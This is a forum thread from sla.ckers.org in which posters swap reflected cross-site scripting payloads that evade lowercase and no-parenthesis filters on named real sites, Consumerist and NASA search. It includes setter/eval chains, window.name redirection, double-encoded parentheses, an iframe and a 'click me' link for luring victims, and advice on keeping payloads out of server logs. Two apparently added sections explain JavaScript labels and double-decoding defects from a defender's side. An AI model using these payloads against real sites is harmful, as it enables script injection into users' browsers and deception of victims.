Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 02:48PM

http://consumerist.com/search/';document.body.innerHTML='test';'/

If you view the source code, you'll see that the above is breaking out of a string in a script tag. Normally, I'd expect this to replace the entire page contents with 'test', but in this case, it isn't (at least not in Firefox), because innerHTML is being turned into innerhtml.

http://consumerist.com/search/';alert('test');/

That doesn't work because parentheses are being stripped. So, any ideas as to what - if anything - will work?

Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: February 29, 2008 03:44PM

http://consumerist.com/search/';a%20setter=alert,a=1;'/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 04:54PM

Wow - that's rather obscure, heh. Thanks!

Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 08:05PM

I was looking into this some more and... I can't think of a way to include an external javascript such as http://ha.ckers.org/s.js with getters or setters?

Or maybe there's another way to use lowercase javascript without parentheses?

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 05:25AM

location=name

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 05:30AM

ma1's method would work but so would mine, mine requires a bit more thought though ;)

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 06:05AM

@Gareth:

the setter trick suffers from 2 limitations:
1) It's not cross browser
2) It works for one shot, one arg evaluations, i.e. it cannot be used with functions which need multiple parameters and the result can't be reused.

Hence if the rules are that no "special" character is allowed besides dots, single quotes and equals (as it seems on that site), the best you can do is probably
a setter = eval, a = name
which has the same constraints as
location = name
(i.e. it needs the window.name property to be pre-injected with the actual payload) but is not portable and requires a comma or a colon, unneeded with the other method.

Obviously I'm very interested in anything that can prove me wrong :)

Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 07:23AM

@ma1

a setter=atob
e setter=eval
e=a='YWxlcnQoL0FueXRoaW5nIS8p'

Also if lowercase is only required and limited characters:-
e setter=eval
e=1+document.location.search+':'+0

Thornmaker has done lots of PHPIDS vectors with setter and although it's Firefox specific I still think it's cool :)

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 08:04AM

@Gareth:

cool!

I don't know why but this morning whenever I tried to chain two setter calls and use escape on uneval output, the right side of the assignment got evaluated instead of the return of the setter function (I even thought of some stack optimization, but it was weird nonetheless) :-k

Since it does actually work as expected instead, a self contained and stealth vector would have been something like
hxxp://consumerist.com/search/';u%20setter=unescape;e%20setter=eval;e=u=location;'/#%0Aalert(1)

"have been" because it looks like they completely disabled the search function :)
Or is it just me?

Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 08:21AM

@ma1

Ah yes the unescape good call :)

Without using location:-
e setter=eval
u setter=unescape
e=u='%61%6c%65%72%74%28%27%58%53%53%27%29'

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 08:39AM

@Gareth:
I didn't mean to use unescape for obfuscation purposes, but just to decode the %0A into a line break, turning all the leading part of the URL into a JS NOP (label + comment), in order to launch an arbitrary hash payload.
Hash and name are better than a hardcoded payload because they do not allow the target server to log the actual "useful things" your reflected XSS does.

Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: March 01, 2008 10:54AM

The escape() method doesn't seem to work. I tried this and it didn't work:

';e setter=eval;u setter=unescape;e=u='%61%6c%65%72%74%28%27%58%53%53%27%29';'

I tried doubly escaping it and it didn't work, either:

';e setter=eval;u setter=unescape;e=u='%2561%256c%2565%2572%2574%2528%2527%2558%2553%2553%2527%2529';'

It's almost as though they're recursively urldecode()'ing the input?

edit: I'm not really sure how ma1's location method works. I modified it slightly to see what eval's input was:

http://consumerist.com/search/';u%20setter=unescape;e%20setter=alert;e=u=location;'/#%0Aalert(1)/

I then copy / pasted that into a separate program and modified it a little and got this:

<script>
a = "zzz:\nalert(1)";

eval(a);
</script>

Why does that work? This doesn't:

<script>
zzz:
aert(1);
</script>

So why does it work in the eval?

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 11:56AM

@yawnmoth:
If you can't grab what location = name does, just try to type this on the address bar in IE (or in Firefox without NoScript):

javascript:window.name="javascript:alert(1)";location.href="http://consumerist.com/search/';location=name;'/";


You can launch it from a scriptless page either using an iframe

<iframe name="javascript:alert(1)" src="http://consumerist.com/search/';location=name;'/"></iframe>

or a simple link, tricking someone into clicking it:

<a target="javascript:alert(1)" href="http://consumerist.com/search/';location=name;'/">click me</a>

Regarding
<script>
somelabel://somecomment
alert(1)
</script>

it works as expected -- I suspect yours doesn't work because you mistyped "aert(1)" (missing "l").

Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: March 01, 2008 07:54PM

Thanks for catching the typo!

Anyway, in researching this further... I didn't actually know about labels. That's what zzz: and http: are acting as, in this case. The // comments out everything after the label.

Are labels a javascript-only thing or do other languages support them?

Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 02, 2008 05:33AM

yawnmoth Wrote:
-------------------------------------------------------
> Are labels are javascript only thing or do other
> languages support them?

Most languages support them.

Syntax may vary, but the "curly braces" family (including C, C++, C# and Java, plus the whole ECMAScript family of course, just to name the most "mainstream") adopts the syntax you've seen in JavaScript.

It was meant as a target for the ill-famed "goto" statement when supported/tolerated, but nowadays it's mainly used in statements like break/continue to specify outer loops.

ECMAScript makes a very extensive use of labels in its object literal notation:
var obj = { label1: someValue, label2: someOtherValue };

Since you're familiar with PHP, you may find this old discussion interesting.

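An added example (not from the thread or from any of its posters) of the label behaviour ma1 and yawnmoth discuss: a line beginning with a scheme such as `http://...` parses as a label followed by a line comment, so whatever statement follows the newline is what runs; and the ordinary use of labels, breaking out of an outer loop. The constructed source string, the hostname `example.invalid` and the function names are assumptions.

```javascript
// Added example, not code from the thread: JavaScript labels.

// To the parser, "http://example.invalid/search/x" is the label `http`
// followed by the comment "//example.invalid/search/x". The labelled
// statement is therefore the one on the next line. new Function parses and
// runs the constructed string; `return 42` stands in for any statement.
function runAfterUrlLabel() {
  const src = "http://example.invalid/search/x\nreturn 42;";
  return new Function(src)();
}

// The same shape written out statically: the label does nothing by itself,
// and the comment after it is discarded, so the `var` statement runs as usual.
function labelledNoop() {
  zzz: // comment after the label; the labelled statement is the next line
  var result = "after label";
  return result;
}

// What labels are normally for: break (or continue) targeting an outer loop.
// Returns the first pair of values (in index order) that sums to `target`.
function firstPairSummingTo(target, values) {
  let found = null;
  outer:
  for (let i = 0; i < values.length; i++) {
    for (let j = i + 1; j < values.length; j++) {
      if (values[i] + values[j] === target) {
        found = [values[i], values[j]];
        break outer; // leaves both loops at once
      }
    }
  }
  return found;
}
```

For a defender the relevant consequence is the one ma1 states: a newline anywhere in attacker-controlled text that reaches a script context turns everything before it into a harmless prefix, so neither "the URL starts with http" nor "the first line is inert" is a useful sanity check.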
Re: all lowercase javascript without parenthesis
Posted by: PaPPy
Date: May 14, 2009 06:48AM

I'm having similar issues with a site but I get no %0a or & or parentheses or single quotes

http://search.nasa.gov/search/search.jsp?nasaInclude=test%22+onmouseover%3D%22document.location%3Dhttp%253A%252F%252Fgoogle%252Ecom

I tried pulling off some of the above alerts but no such luck

http://www.xssed.com/archive/author=PaPPy/

Re: all lowercase javascript without parenthesis
Posted by: Jurpie
Date: May 15, 2009 04:09AM

PaPPy Wrote:
-------------------------------------------------------
> im having simliar issues with a site but i get no
> %0a or & or parenthesis or single quotes
>
> http://search.nasa.gov/search/search.jsp?nasaInclu
> de=test%22+onmouseover%3D%22document.location%3Dht
> tp%253A%252F%252Fgoogle%252Ecom
>
> i tried pulling off some of the above alerts but
> no such luck

You can try something like this:

http://search.nasa.gov/search/search.jsp?nasaInclude=javascript:alert%2528%2527Hi%20Nasa!%2527%2529%22%20onmouseover=%22window.location=this.value%22%20style=%22width:1000px


It works by double encoding parenthesis.

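An added example (not from the thread or from any of its posters) of the double-decoding defect that yawnmoth suspects ("recursively urldecode()'ing the input") and that Jurpie's double-encoded parentheses rely on: if a server decodes a parameter, filters it, and decodes again, characters hidden as %25XX reappear after the filter has run. The contrast is the single-decode-then-encode path for an HTML attribute context. The sample input and the function names are constructed assumptions; only `decodeURIComponent` is a real API, and it does not translate `+` to a space, hence the explicit replacement.

```javascript
// Added example, not code from the thread: double decoding versus a single
// decode followed by context-specific encoding.

// Constructed sample: parentheses double-encoded (%28 -> %2528), a double
// quote encoded once (%22), and a form-style '+' for a space.
const RAW = "test%2528x%2529%22+onmouseover%3D%22y";

// Faulty behaviour: decode, filter, decode again. The filter never sees the
// parentheses because at that point they are still the text "%28" and "%29".
function decodeTwiceAfterFilter(raw) {
  const once = decodeURIComponent(raw);        // test%28x%29"+onmouseover="y
  const filtered = once.replace(/[()]/g, "");  // nothing to strip yet
  return decodeURIComponent(filtered);         // parentheses reappear here
}

// Encode for an HTML attribute value: the five characters that can end the
// attribute or start markup become entities.
function encodeForHtmlAttribute(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Correct path: decode exactly once ('+' handled as form encoding first),
// then encode for the context the value lands in. "%28" stays literal text
// and the quote that would have closed the attribute becomes &quot;.
function decodeOnceThenEncode(raw) {
  const once = decodeURIComponent(raw.replace(/\+/g, " "));
  return encodeForHtmlAttribute(once);
}
```

A quick check for this class of bug during a review is exactly the probe Jurpie's post implies: submit %25XX for a character the filter rejects and see whether the raw character shows up in the response; if it does, the application decodes more than once.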
Re: all lowercase javascript without parenthesis
Posted by: Kyo
Date: May 15, 2009 11:24AM

edit: oh wait never mind, missed the parentheses bit
